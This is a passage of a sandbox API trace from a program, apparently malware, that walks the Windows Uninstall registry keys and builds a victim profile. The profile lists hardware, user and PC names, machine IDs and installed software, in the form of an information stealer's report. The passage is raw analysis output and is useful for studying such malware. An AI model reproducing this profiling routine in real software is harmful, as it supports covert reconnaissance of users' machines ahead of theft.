11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030" [0235.138] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="11.0.61030.0", lpcbData=0x197fac*=0xd) returned 0x0 [0235.138] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 " [0235.138] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 ", lpString2="11.0.61030.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0" [0235.138] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n" [0235.138] RegCloseKey (hKey=0x384) returned 0x0 [0235.138] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x22, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.138] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 90 [0235.138] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.138] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpcbData=0x197fac*=0x3d) returned 0x0 [0235.139] lstrlenA (lpString="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501") returned 60 [0235.139] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n", lpString2="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501" [0235.139] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="12.0.30501.0", lpcbData=0x197fac*=0xd) returned 0x0 [0235.139] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: 